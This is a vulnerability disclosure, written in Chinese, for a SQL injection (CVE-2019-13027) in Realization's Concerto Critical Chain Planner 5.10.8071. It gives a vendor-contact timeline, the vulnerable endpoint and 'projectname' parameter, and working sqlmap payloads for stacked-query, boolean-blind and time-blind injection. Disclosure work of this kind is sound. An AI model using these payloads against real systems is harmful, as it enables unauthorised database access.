披露 CVE-2019-13027 的详细信息
供应商联系时间线: 2019年7月1日 -> 无回复,无邮件回复。
2019年7月4日 -> 无回复,无邮件回复。
2019年7月8日 -> 发送邮件,创建了 Github 仓库。
2019年7月11日 -> 供应商未回应。漏洞已披露。
[漏洞类型] SQL 注入 [受影响的产品代码库] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - 版本: 5.10.8071(5.x 分支的其他版本可能也受影响,但无法测试其他分支)
[受影响组件] Realization Concerto Critical Chain Planner(简称 CCPM)5.10.8071 存在一些严重的安全问题, 其中至少包括 taskupdt/taskdetails.aspx 网页中通过 "projectname" 参数触发的 SQL 注入
[攻击类型] 远程
[攻击向量] 应用程序存在大量反射型 XSS/CSRF(例如在 checklist/checklist 中),但棘手之处在于 SQL 注入。根据 SQL Server 版本和/或 IDS/IPS 的不同,可能需要进行一些篡改。
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
projectname(foo)必须存在且有效。对其他参数进行模糊测试(或使用真实请求)。 foo 也存在 XSS
检测到的 SQL(来自 SQLMAP 的载荷) 参数: projectname (GET)
类型: 堆叠查询 标题: Microsoft SQL Server/Sybase 堆叠查询(注释) 载荷: projectname=foo';WAITFOR DELAY '0:0:5'-- 类型: 基于布尔的盲注 标题: AND 基于布尔的盲注 - WHERE 或 HAVING 子句 载荷: projectname=foo' AND 3676=3676-- 类型: 基于时间的盲注 标题: Microsoft SQL Server/Sybase 基于时间的盲注(IF) 载荷: projectname=foo' WAITFOR DELAY '0:0:5'--[产品供应商] REALIZATION - https://www.realization.com/